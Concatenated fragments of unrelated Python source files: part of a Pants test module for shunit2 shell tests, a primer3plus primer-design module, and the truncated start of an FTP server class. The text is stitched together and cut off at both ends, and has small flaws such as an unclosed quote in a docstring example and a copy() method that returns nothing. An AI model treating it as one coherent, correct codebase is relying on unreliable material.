"", (Shunit2FieldSet.create(test_target),), None
)
test_result = rule_runner.request(TestResult, [input])
debug_request = rule_runner.request(TestDebugRequest, [input])
if debug_request.process is not None:
with mock_console(rule_runner.options_bootstrapper):
debug_result = rule_runner.run_interactive_process(debug_request.process)
assert test_result.exit_code == debug_result.exit_code
return test_result
def test_passing(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files({"tests.sh": GOOD_TEST, "BUILD": "shunit2_tests(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_failing(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files(
{
"tests.sh": dedent(
"""\
#!/usr/bin/bash
testEquality() {
assertEquals 1 5
}
"""
),
"BUILD": "shunit2_tests(name='t')",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 1
assert "Ran 1 test.\n\nFAILED" in result.stdout
def test_dependencies(rule_runner: PythonRuleRunner) -> None:
"""Ensure direct and transitive dependencies work."""
rule_runner.write_files(
{
"transitive.sh": dedent(
"""\
add_one() {
echo $(($1 + 1))
}
"""
),
"direct.sh": dedent(
"""\
source transitive.sh
add_two() {
echo $(($(add_one $1) + 1))
}
"""
),
"tests.sh": dedent(
"""\
#!/usr/bin/bash
source direct.sh
testAdd() {
assertEquals $(add_two 2) 4
}
"""
),
"BUILD": dedent(
"""\
shunit2_tests(name="t", dependencies=[':direct'])
shell_source(name="direct", source='direct.sh', dependencies=[':transitive'])
shell_source(name="transitive", source='transitive.sh')
"""
),
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_subdirectories(rule_runner: PythonRuleRunner) -> None:
# We always download the shunit2 script to the build root - this test is a smoke screen that
# we properly source the file.
rule_runner.write_files({"a/b/c/tests.sh": GOOD_TEST, "a/b/c/BUILD": "shunit2_tests()"})
tgt = rule_runner.get_target(Address("a/b/c", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
@pytest.mark.skip(
"TODO: figure out why the rule is getting memoized but that doesn't happen with Pytest."
"The Process is not being cached, but the rule invocation is being memoized so the "
"`--force` does not work properly."
)
@pytest.mark.no_error_if_skipped
def test_force(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files({"tests.sh": GOOD_TEST, "BUILD": "shunit2_tests(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
# Should not receive a memoized result if force=True.
result_one = run_shunit2(rule_runner, tgt, extra_args=["--test-force"])
result_two = run_shunit2(rule_runner, tgt, extra_args=["--test-force"])
assert result_one.exit_code == 0
assert result_two.exit_code == 0
assert result_one is not result_two
# But should if force=False.
result_one = run_shunit2(rule_runner, tgt)
result_two = run_shunit2(rule_runner, tgt)
assert result_one.exit_code == 0
assert result_one is result_two
def test_extra_env_vars(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files(
{
"tests.sh": dedent(
"""\
#!/usr/bin/bash
testEnv() {
assertEquals "${SOME_VAR}" some_value
assertEquals "${OTHER_VAR}" other_value
}
"""
),
"BUILD": "shunit2_tests(name='t')",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(
rule_runner,
tgt,
extra_args=['--test-extra-env-vars=["SOME_VAR=some_value", "OTHER_VAR"]'],
env={"OTHER_VAR": "other_value"},
)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_runtime_package_dependency(rule_runner: PythonRuleRunner) -> None:
rule_runner.write_files(
{
"src/py/main.py": "",
"src/py/BUILD": dedent(
"""\
python_sources()
pex_binary(name='main', entry_point='main.py')
"""
),
"tests.sh": dedent(
"""\
#!/usr/bin/bash
testArchive() {
assertTrue "[[ -f src.py/main.pex ]]"
# Ensure the pex's dependencies are not included, only the final result.
assertFalse "[[ -f src/py/main.py ]]"
}
"""
),
"BUILD": "shunit2_tests(name='t', runtime_package_dependencies=['src/py:main'])",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh"))
result = run_shunit2(rule_runner, tgt)
assert result.exit_code == 0
assert "Ran 1 test.\n\nOK" in result.stdout
def test_determine_shell_runner(rule_runner: PythonRuleRunner) -> None:
addr = Address("", target_name="t")
fc = FileContent("tests.sh", b"#!/usr/bin/env sh")
rule_runner.set_options([], env_inherit={"PATH"})
# If `shell` field is not set, read the shebang.
result = rule_runner.request(
Shunit2Runner, [Shunit2RunnerRequest(addr, fc, Shunit2ShellField(None, addr))]
)
assert result.shell == Shunit2Shell.sh
# The `shell` field overrides the shebang.
result = rule_runner.request(
Shunit2Runner, [Shunit2RunnerRequest(addr, fc, Shunit2ShellField("bash", addr))]
)
assert result.shell == Shunit2Shell.bash
# Error if not set.
with pytest.raises(ExecutionError) as exc:
rule_runner.request(
Shunit2Runner,
[
Shunit2RunnerRequest(
addr, FileContent("tests.sh", b""), Shunit2ShellField(None, addr)
)
],
)
assert f"Could not determine which shell to use to run shunit2 on {addr}" in str(exc.value)
|
/root/nfs/jooho/openshift-ansible/library/modify_yaml.py
|
"""Core design modules.
For examples for how to use the design module, see the :doc:`Usage Docs <../usage>`
For a list of design parameters available, take a look at the
:ref:`BoulderIO Parameters <api_default_parameters>`
.. code-block:: python
# a new task
design = Design()
# set template sequence
design.settings.template("AGGTTGCGTGTGTATGGTCGTGTAGTGTGT")
# set left primer sequence
design.settings.left_sequence("GTTGCGTGTGT)
# set as a cloning task
design.settings.as_cloning_task()
# run the design task
design.run()
"""
import re
import webbrowser
from typing import Any
from typing import Dict
from typing import List
from typing import Tuple
from typing import Union
from warnings import warn
import primer3
from .interfaces import AllParameters
from .interfaces import ParameterAccessor
from .results import parse_primer3_results
from primer3plus.constants import DOCURL
from primer3plus.exceptions import Primer3PlusException
from primer3plus.exceptions import Primer3PlusRunTimeError
from primer3plus.exceptions import Primer3PlusWarning
from primer3plus.log import logger
from primer3plus.params import BoulderIO
from primer3plus.params import default_boulderio
from primer3plus.utils import anneal as anneal_primer
from primer3plus.utils import depreciated_warning
class DesignPresets:
"""Interface for setting design parameters. This is typically accessed from
a :class:`Design <primer3plus.Design>` instance's.
:meth:`Design <primer3plus.Design.set>` method. As in:
.. code-block::
design = Design()
design.settings.left_sequence("AGGGAGATAGATA")
design.run()
"""
def __init__(self, design):
"""Initializes a new interface from a.
:class:`~primer3plus.design.Design`.
:param design: The design
"""
self._design = design
def _resolve(self):
"""Process any extra parameters and process BoulderIO so that it is
digestable by primer3."""
if self._design.PRIMER_USE_OVERHANGS.value:
self._resolve_overhangs(self._design.PRIMER_MIN_ANNEAL_CHECK.value)
if self._design.PRIMER_LONG_OK.value:
self._resolve_max_lengths(lim=BoulderIO.PRIMER_MAX_SIZE_HARD_LIM)
self._resolve_product_sizes()
if not self._design.PRIMER_USE_OVERHANGS.value:
if self._design.SEQUENCE_PRIMER_OVERHANG.value:
warn(
Primer3PlusWarning(
"{} is non-empty (value={}) but {} was False. Overhang was"
" ignored".format(
self._design.SEQUENCE_PRIMER_OVERHANG.name,
self._design.SEQUENCE_PRIMER_OVERHANG.value,
self._design.PRIMER_USE_OVERHANGS.name,
)
)
)
if self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value:
warn(
Primer3PlusWarning(
"{} is non-empty (value={}) but {} was False. Overhang was"
" ignored".format(
self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.name,
self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value,
self._design.PRIMER_USE_OVERHANGS.name,
)
)
)
return self
def _post_parse(self, pairs, explain) -> None:
"""Modify results from design parameters (e.g. overhangs)"""
left_long_overhang = self._design._SEQUENCE_LONG_OVERHANG.value
right_long_overhang = self._design._SEQUENCE_REVCOMP_LONG_OVERHANG.value
for pair in pairs.values():
for x in ["LEFT", "RIGHT"]:
pair[x].setdefault("OVERHANG", "")
if self._design.PRIMER_USE_OVERHANGS:
pair["LEFT"]["OVERHANG"] = self._design.SEQUENCE_PRIMER_OVERHANG.value
pair["RIGHT"][
"OVERHANG"
] = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value
if left_long_overhang:
pair["LEFT"]["SEQUENCE"] = (
left_long_overhang + pair["LEFT"]["SEQUENCE"]
)
pair["LEFT"]["OVERHANG"] = pair["LEFT"]["OVERHANG"][
: -len(left_long_overhang)
]
pair["PAIR"]["PRODUCT_SIZE"] += len(left_long_overhang)
loc = pair["LEFT"]["location"]
pair["LEFT"]["location"] = [
loc[0] - len(left_long_overhang),
len(pair["LEFT"]["SEQUENCE"]),
]
if right_long_overhang:
pair["RIGHT"]["SEQUENCE"] = (
right_long_overhang + pair["RIGHT"]["SEQUENCE"]
)
pair["RIGHT"]["OVERHANG"] = pair["RIGHT"]["OVERHANG"][
: -len(right_long_overhang)
]
pair["PAIR"]["PRODUCT_SIZE"] += len(right_long_overhang)
loc = pair["RIGHT"]["location"]
pair["RIGHT"]["location"] = [
loc[0] + len(right_long_overhang),
len(pair["RIGHT"]["SEQUENCE"]),
]
def _interval_from_sequences(
self, template: str, target: str
) -> Union[None, Tuple[int, int]]:
if isinstance(target, str):
matches = self._get_index_of_match(template, target)
if not matches:
print("Target not in template")
return None
if len(matches) > 1:
print("More than one target found")
return None
return matches[0]
@staticmethod
def _get_index_of_match(template: str, sequence: str) -> List[Tuple[int, int]]:
matches = []
for m in re.finditer(sequence, template, re.IGNORECASE):
matches.append((m.start(0), m.end(0)))
return matches
def update(self, update: Dict[str, Any]):
"""Update an arbitrary parameter."""
self._design.params.update(update)
return self
def task(self, task: str) -> "DesignPresets":
"""This tag tells primer3 what task to perform.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK
:param task: the task name
:return self
"""
self.update({"PRIMER_TASK": task})
return self
def as_cloning_task(self) -> "DesignPresets":
"""Set the design as a cloning task.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK
:return: self
"""
return self.task("pick_cloning_primers")
def as_generic_task(self) -> "DesignPresets":
"""Set the design as a generic task.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK
:return: self
"""
return self.task("generic")
def template(self, template: str) -> "DesignPresets":
"""Set the template sequence for the design. This sets the
'SEQUENCE_TEMPLATE' parameter.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE
:param template: the template sequence
:return: self
"""
self.update({"SEQUENCE_TEMPLATE": template})
return self
# TODO: set_iterations, set_num_return, set_force_return, set_gradient
def primer_num_return(self, n: int) -> "DesignPresets":
"""Set the number of primers to return for the design task.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_NUM_RETURN
:param n: number of primers to return
:return: self
"""
return self.update({"PRIMER_NUM_RETURN": n})
def product_size(
self, interval: Union[Tuple[int, int], List[Tuple[int, int]]], opt=None
) -> "DesignPresets":
"""Set the product size. Optionally include the optimal size.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PRODUCT_SIZE_RANGE
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PRODUCT_OPT_SIZE
:param interval: a tuple of <min>,<max> or a list of such tuples
:param opt: optional product size as an int.
:return: self
"""
if isinstance(interval, tuple):
interval = [interval]
if opt is not None:
return self.update(
{"PRIMER_PRODUCT_SIZE_RANGE": interval, "PRIMER_PRODUCT_OPT_SIZE": opt}
)
return self.update({"PRIMER_PRODUCT_SIZE_RANGE": interval})
def pair_region_list(
self, region_list: List[Tuple[int, int, int, int]]
) -> "DesignPresets":
"""The list of regions from which to design primers.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_PAIR_OK_REGION_LIST
:param region_list: list of regions
:return: self
"""
return self.update({"SEQUENCE_PRIMER_PAIR_OK_REGION_LIST": region_list})
def left_sequence(self, primer: str) -> "DesignPresets":
"""The sequence of a left primer to check and around which to design
right primers and optional internal oligos. Must be a substring of
SEQUENCE_TEMPLATE.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
:param primer: the primer sequence
:return: self
"""
return self.update({"SEQUENCE_PRIMER": primer, "PRIMER_PICK_RIGHT_PRIMER": 1})
def right_sequence(self, primer: str) -> "DesignPresets":
"""The sequence of a right primer to check and around which to design
left primers and optional internal oligos. Must be a substring of the
reverse strand of SEQUENCE_TEMPLATE.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_REVCOMP
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
:param primer: the primer sequence
:return: self
"""
return self.update(
{"SEQUENCE_PRIMER_REVCOMP": primer, "PRIMER_PICK_LEFT_PRIMER": 1}
)
@staticmethod
def _trim_long(overhang: str, anneal: str, lim: int) -> Tuple[str, str, str]:
"""Fix the overhang and anneal from the hardcoded BoulderIO primer
lim."""
return overhang, anneal[:-lim], anneal[-lim:]
def _get_left_overhang(self, min_primer_anneal: int):
left = self._design.SEQUENCE_PRIMER.value
if left:
fwd, _ = anneal_primer(
self._design.SEQUENCE_TEMPLATE.value, [left], n_bases=min_primer_anneal
)
if len(fwd) == 0:
raise Primer3PlusRunTimeError("No annealing found for left sequence.")
elif len(fwd) > 1:
raise Primer3PlusRunTimeError(
"More than one annealing found for left sequence."
)
overhang = fwd[0]["overhang"]
anneal = fwd[0]["anneal"]
return overhang, anneal
else:
return "", left
def _get_right_overhang(self, min_primer_anneal: int):
right = self._design.SEQUENCE_PRIMER_REVCOMP.value
if right:
_, rev = anneal_primer(
self._design.SEQUENCE_TEMPLATE.value, [right], n_bases=min_primer_anneal
)
if len(rev) == 0:
raise Primer3PlusRunTimeError("No annealing found for right sequence.")
elif len(rev) > 1:
raise Primer3PlusRunTimeError(
"More than one annealing found for right "
"sequence {}.".format(self._design.SEQUENCE_PRIMER_REVCOMP)
)
overhang = rev[0]["overhang"]
anneal = rev[0]["anneal"]
return overhang, anneal
else:
return "", right
def left_overhang(self, overhang: str) -> "DesignPresets":
"""Sets the left overhang sequence for the primer. This overhang will.
*always* be in the overhang sequence regardless of other parameters.
If using a primer that anneals with an overhang, this value will
be appended to the 5' end of the overhang.
:param overhang: overhang sequence
:return: self
"""
return self.update({"SEQUENCE_PRIMER_OVERHANG": overhang})
def right_overhang(self, overhang: str) -> "DesignPresets":
"""Sets the right overhang sequence for the primer. This overhang will.
*always* be in the overhang sequence regardless of other parameters.
If using a primer that anneals with an overhang, this value will
be appended to the 5' end of the overhang.
:param overhang: overhang sequence
:return: self
"""
return self.update({"SEQUENCE_PRIMER_REVCOMP_OVERHANG": overhang})
def use_overhangs(self, b: bool = True) -> "DesignPresets":
"""Set the BoulderIO to process overhangs.
:param b: boolean to set
:return: self
"""
return self.update({"PRIMER_USE_OVERHANGS": b})
def long_ok(self, b: bool = True) -> "DesignPresets":
"""Set the BoulderIO to process long primers.
:param b: boolean to set
:return: self
"""
return self.update({"PRIMER_LONG_OK": b})
def _resolve_product_sizes(self):
"""If there are long primers being used, the product_size is no longer
valid as the trimmed sequence is no longer represented in the
originally provided product size.
This re-adjusts the product size to correspond the adjusted
parameters.
"""
# adjust product size range
left_long_overhang = self._design._SEQUENCE_LONG_OVERHANG.value
right_long_overhang = self._design._SEQUENCE_REVCOMP_LONG_OVERHANG.value
product_sizes = self._design.PRIMER_PRODUCT_SIZE_RANGE.value
x = len(left_long_overhang) + len(right_long_overhang)
if isinstance(product_sizes[0], tuple):
new_product_sizes = []
for size in product_sizes:
new_product_sizes.append((size[0] - x, size[1] - x))
self._design.PRIMER_PRODUCT_SIZE_RANGE.value = new_product_sizes
else:
size = self._design.PRIMER_PRODUCT_SIZE_RANGE.value
self._design.PRIMER_PRODUCT_SIZE_RANGE.value = [size[0] - x, size[1] - x]
def _resolve_max_lengths(self, lim: int):
"""Fixes the annealing and overhang sequences for annealing sequences
for primers over the :attr:`BoulderIO.
<primer3plus.paramsBoulderIO.PRIMER_MAX_SIZE_HARD_LIM>`.
Should always be run *after* :meth:`_resolve_overhangs`.
"""
left_anneal = self._design.SEQUENCE_PRIMER.value
right_anneal = self._design.SEQUENCE_PRIMER_REVCOMP.value
left_over = self._design.SEQUENCE_PRIMER_OVERHANG.value
right_over = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value
left_over, left_long_overhang, left_anneal = self._trim_long(
left_over, left_anneal, lim=lim
)
right_over, right_long_overhang, right_anneal = self._trim_long(
right_over, right_anneal, lim=lim
)
self.left_overhang(left_over + left_long_overhang)
self.right_overhang(right_over + right_long_overhang)
# save the sequences that were trimmed
# TODO: will need to re-add these in the results in overhang, product size, and anneal
# TODO: adjust the product_size
# TODO: adjust any other regions
# TODO: re-adjust tm and add any warnings
# save values for long overhangs
self._left_long_overhang(left_long_overhang)
self._right_long_overhang(right_long_overhang)
self.left_sequence(left_anneal)
self.right_sequence(right_anneal)
def _left_long_overhang(self, x):
self.update({"_SEQUENCE_LONG_OVERHANG": x})
def _right_long_overhang(self, x):
self.update({"_SEQUENCE_REVCOMP_LONG_OVERHANG": x})
def _resolve_overhangs(self, min_primer_anneal: int):
"""Sets the annealing and overhang sequences."""
left_over, left_anneal = self._get_left_overhang(min_primer_anneal)
_loverhang = self._design.SEQUENCE_PRIMER_OVERHANG.value
if _loverhang:
left_over = _loverhang + left_over
# raise ValueError(
# "Left overhang already set to '{}'.".format(_loverhang)
# )
right_over, right_anneal = self._get_right_overhang(min_primer_anneal)
_roverhang = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value
if _roverhang:
right_over = _roverhang + right_over
# raise ValueError(
# "Right overhang already set to '{}'.".format(_roverhang)
# )
self.left_overhang(left_over)
self.right_overhang(right_over)
self.left_sequence(left_anneal)
self.right_sequence(right_anneal)
def pick_left_only(self) -> "DesignPresets":
"""Design only the left primer.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
:return: self
"""
return self.update(
{"PRIMER_PICK_LEFT_PRIMER": 1, "PRIMER_PICK_RIGHT_PRIMER": 0}
)
def pick_right_only(self) -> "DesignPresets":
"""Design only the right primer.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
:return: self
"""
return self.update(
{"PRIMER_PICK_LEFT_PRIMER": 0, "PRIMER_PICK_RIGHT_PRIMER": 1}
)
def internal_sequence(self, primer: str) -> "DesignPresets":
"""The sequence of an internal oligo to check and around which to
design left and right primers. Must be a substring of
SEQUENCE_TEMPLATE.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_INTERNAL_OLIGO
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_INTERNAL_OLIGO
:param primer: :type primer: :return: :rtype:
"""
return self.update(
{"SEQUENCE_INTERNAL_OLIGO": primer, "PRIMER_PICK_INTERNAL_OLIGO": 1}
)
def primers(self, p1: str, p2: str) -> "DesignPresets":
"""Set the left and right primer sequences.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_REVCOMP
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER
:param p1:
:param p2:
:return:
"""
if p1:
self.left_sequence(p1)
if p2:
self.right_sequence(p2)
return self
def primers_with_overhangs(self, p1: str, p2: str) -> "DesignPresets":
if p1:
self.left_sequence_with_overhang(p1)
if p2:
self.right_sequence_with_overhang(p2)
return self
def _parse_interval(
self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]]
) -> List[Tuple[int, int]]:
if isinstance(interval, str):
interval = self._interval_from_sequences(
self._design.params["SEQUENCE_TEMPLATE"], interval
)
if isinstance(interval, tuple):
interval = [interval]
return interval
def included(self, interval: Union[str, Tuple[int, int]]) -> "DesignPresets":
"""Specify interval from which primers must be selected. A sub-region
of the given sequence in which to pick primers. For example, often the
first dozen or so bases of a sequence are vector, and should be
excluded from consideration. The value for this parameter has the form.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_INCLUDED_REGION
<start>,<length> where <start> is the index of the first base to consider, and
<length> is the number of subsequent bases in the primer-picking region.
:param interval: One of the following: the sequence of the target region,
a tuple of the interval of <start>,<length> or a str
:return: self
"""
if isinstance(interval, str):
interval = self._interval_from_sequences(
self._design.params["SEQUENCE_TEMPLATE"], interval
)
if not len(interval) == 2 or (
not isinstance(interval, tuple) and not isinstance(interval, list)
):
raise TypeError(
"Expect an tuple or list of length 2 but found {}".format(interval)
)
interval = list(interval)
return self.update({"SEQUENCE_INCLUDED_REGION": interval})
def target(
self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]]
) -> "DesignPresets":
"""Specify the interval that designed primers must flank. If one or
more targets is specified then a legal primer pair must flank at least
one of them. A target might be a simple sequence repeat site (for
example a CA repeat) or a single-base-pair polymorphism, or an exon for
resequencing. The value should be a space-separated list of.
<start>,<length> pairs where <start> is the index of the first base of
a target,and <length> is its length. See also PRIMER_INSIDE_PENALTY,
PRIMER_OUTSIDE_PENALTY. PRIMER_TASK=pick_sequencing_primers. See
PRIMER_TASK for more information.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TARGET
:param interval: One of the following: the sequence of the target region,
a tuple of the interval of <start>,<length>, or a list of
tuples of <start>,<length>
:return self
"""
return self.update({"SEQUENCE_TARGET": self._parse_interval(interval)})
def excluded(
self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]]
) -> "DesignPresets":
"""Primers and oligos may not overlap any region specified in this tag.
The associated value must be a space-separated list of <start>,<length>
pairs where <start> is the index of the first base of the excluded
region, and <length> is its length. This tag is useful for tasks such
as excluding regions of low sequence quality or for excluding regions
containing repetitive elements such as ALUs or LINEs.
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE
http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_EXCLUDED_REGION
:param interval: One of the following: the sequence of the target region,
a tuple of the interval of <start>,<length>, or a list of
tuples of <start>,<length>
:return: self
"""
return self.update({"SEQUENCE_EXCLUDED_REGION": self._parse_interval(interval)})
def pick_anyway(self, b=1) -> "DesignPresets":
"""If true use primer provided in SEQUENCE_PRIMER,
SEQUENCE_PRIMER_REVCOMP, or SEQUENCE_INTERNAL_OLIGO even if it violates
specific constraints.
http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_ANYWAY
:param b: default True
:return self
"""
return self.update({"PRIMER_PICK_ANYWAY": b})
def clip(x, mn, mx):
return max(min(x, mx), mn)
class DesignBase:
"""Base design."""
DEFAULT_PARAMS = default_boulderio #: default parameters
DEFAULT_GRADIENT = dict(
PRIMER_MAX_SIZE=(1, DEFAULT_PARAMS["PRIMER_MAX_SIZE"], 36),
PRIMER_MIN_SIZE=(-1, 16, DEFAULT_PARAMS["PRIMER_MAX_SIZE"]),
PRIMER_MAX_TM=(1, DEFAULT_PARAMS["PRIMER_MAX_SIZE"], 80),
PRIMER_MIN_TM=(-1, 48, DEFAULT_PARAMS["PRIMER_MIN_TM"]),
PRIMER_MAX_HAIRPIN_TH=(1, DEFAULT_PARAMS["PRIMER_MAX_HAIRPIN_TH"], 60),
) #: the default gradient to use for the :meth:`Design.run_and_optimize` method.
_CHECK_PRIMERS = "check_primers"
_GENERIC = "generic"
_PICK_PRIMER_LIST = "pick_primer_list"
_PICK_SEQUENCING_PRIMERS = "pick_sequencing_primers"
_PICK_CLONING_PRIMERS = "pick_cloning_primers"
_PICK_DISCRIMINATIVE_PRIMERS = "pick_discriminative_primers"
def __init__(
self,
gradient: Dict[
str, Tuple[Union[float, int], Union[float, int], Union[float, int]]
] = None,
params: BoulderIO = None,
quiet_runtime: bool = False,
):
"""Initializes a new design.
:param gradient: the design gradient.
:param quiet_runtime: if True will siliently ignore any runtime errors.
"""
if params is None:
params = self.DEFAULT_PARAMS.copy()
self.params = params
self.logger = logger(self)
self.gradient = gradient
self.quiet_runtime = quiet_runtime
def _raise_run_time_error(self, msg: str) -> Primer3PlusRunTimeError:
"""Raise a Primer3PlusRunTime exception. If parameters are named in the
msg, print off some debugging information at the end of the message.
:param msg: the error msg
:return: the run time exception
"""
parameter_explain = set()
for name, value in self.params._params.items():
if name in msg:
parameter_explain.add("\t" + str(value))
parameter_explain = sorted(parameter_explain)
return Primer3PlusRunTimeError(msg + "\n" + "\n".join(parameter_explain))
def _run(self, params: BoulderIO = None) -> Tuple[List[Dict], List[Dict]]:
"""Design primers. Optionally provide additional parameters.
:param params:
:return: results
"""
if params is None:
params = self.params
try:
res = primer3.bindings.designPrimers(params._sequence(), params._globals())
except OSError as e:
if not self.quiet_runtime:
raise self._raise_run_time_error(str(e)) from e
else:
return {}, {"PRIMER_ERROR": str(e)}
except Primer3PlusRunTimeError as e:
if not self.quiet_runtime:
raise self._raise_run_time_error(str(e)) from e
else:
return {}, {"PRIMER_ERROR": str(e)}
except Primer3PlusException as e:
raise self._raise_run_time_error(str(e)) from e
pairs, explain = parse_primer3_results(res)
self.settings._post_parse(pairs, explain)
return pairs, explain
def run(self) -> Tuple[List[Dict], List[Dict]]:
"""Design primers. Optionally provide additional parameters.
:param params:
:return: results
"""
return self._run()
def run_and_optimize(
self,
max_iterations,
params: BoulderIO = None,
gradient: Dict[
str, Tuple[Union[float, int], Union[float, int], Union[float, int]]
] = None,
run_kwargs: dict = None,
) -> Tuple[List[dict], List[dict]]:
"""Design primers and relax constraints. If primer design is
unsuccessful, relax parameters as defined in
primer3plust.Design.DEFAULT_GRADIENT. Repeat for the specified number
of max_iterations.
:param max_iterations: the max number of iterations to perform relaxation
:param params: optional parameters to provide
:param gradient: optional gradient to provide. If not provided,
Design.DEFAULT_GRADIENT will be used. The gradient is a
dictionary off 3 tuples, the step the min and the max.
:return: results
"""
if gradient is None:
gradient = self.gradient or self.DEFAULT_GRADIENT
if params is None:
params = self.params
pairs, explain = self._run(params)
i = 0
while i < max_iterations and len(pairs) == 0:
i += 1
update = self._update_dict(params, gradient=gradient)
if update:
self.logger.info("Updated: {}".format(update))
else:
self.logger.info("Reached end of gradient.")
break
self.params.update(update)
pairs, explain = self._run(params)
return pairs, explain
@staticmethod
def _update_dict(params, gradient):
update = {}
for param_key, gradient_tuple in gradient.items():
delta, mn, mx = gradient_tuple
try:
val = params[param_key] + delta
val = clip(val, mn, mx)
if params[param_key] != val:
update[param_key] = val
except Exception as e:
raise e
return update
@staticmethod
def open_help():
"""Open the documentation help in a new browser tab."""
webbrowser.open(DOCURL)
def copy(self):
"""Copy this design and its parameters."""
designer = self.__class__()
designer.params = self.params.copy()
def __copy__(self):
return self.copy()
class RestoreAfterRun:
"""Class to restore boulderio to its original parameters after a run."""
def __init__(self, boulderio):
self.params = boulderio
def __enter__(self):
for v in self.params._params.values():
v.hold_restore()
def __exit__(self, a, b, c):
for v in self.params._params.values():
v.restore()
class Design(DesignBase, AllParameters):
def __init__(self):
"""Initialize a new design. Set parameters using.
:attr:`Design.settings`, which
returns an instance of
:class:`DesignPresets <primer3plus.design.DesignPresets>`.
Alternatively, parameters can be accessed more directly using
the name of the parameter descriptor. For a list of parameters available, see
:ref:`BoulderIO Parameters <api_default_parameters>`.
.. code-block::
design = Design()
design.settings.template("AGGCTGTAGTGCTTGTAGCTGGTTGCGTTACTGTG")
design.settings.left_sequence("GTAGTGCTTGTA")
design.SEQUENCE_ID.value = "MY ID"
design.run()
"""
super().__init__()
self._settings = DesignPresets(self)
def set(self, key, value):
self.params.defs[key].value = value
def get(self, key):
return self.params.defs[key]
@property
def settings(self) -> "DesignPresets":
"""Return the :class:`DesignPresets <primer3plus.design.DesignPresets>`
instance for this design."""
return self._settings
@property
def presets(self):
depreciated_warning("'presets' has been renamed to 'settings'")
return self.settings
def update(self, data: Dict[str, Any]):
"""Update an arbitrary parameter."""
return self.params.update(data)
def run(self) -> Tuple[List[Dict], List[Dict]]:
"""Design primers. Optionally provide additional parameters.
:param params:
:return: results
"""
with RestoreAfterRun(self.params):
self.settings._resolve()
return super()._run(None)
def run_and_optimize(
self,
max_iterations,
params: BoulderIO = None,
gradient: Dict[
str, Tuple[Union[float, int], Union[float, int], Union[float, int]]
] = None,
pick_anyway: bool = False,
) -> Tuple[List[dict], List[dict]]:
"""Design primers. If primer design is unsuccessful, relax parameters
as defined in primer3plust.Design.DEFAULT_GRADIENT. Repeat for the
specified number of max_iterations.
:param max_iterations: the max number of iterations to perform relaxation
:param params: optional parameters to provide
:param gradient: optional gradient to provide. If not provided,
Design.DEFAULT_GRADIENT will be used. The gradient is a
dictionary off 3 tuples, the step the min and the max.
:param pick_anyway: if set to True, if the optimization finds no pairs,
pick a pair anyways.
:return: results
"""
with RestoreAfterRun(self.params):
self.settings._resolve()
pairs, explain = super().run_and_optimize(max_iterations)
if pick_anyway and not pairs:
self.settings.pick_anyway(1)
pairs, explain = super().run()
return pairs, explain
def new(params=None):
"""Start a new design."""
design = Design()
if params:
design.params.update(params)
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from socket import *
from conf.settings import *
import configparser
import struct
import json
import time
import sys
import hashlib
import subprocess
class FtpServer:
address_family = AF_INET
socket_type = SOCK_STREAM
def __init__(self, server_address):
"""
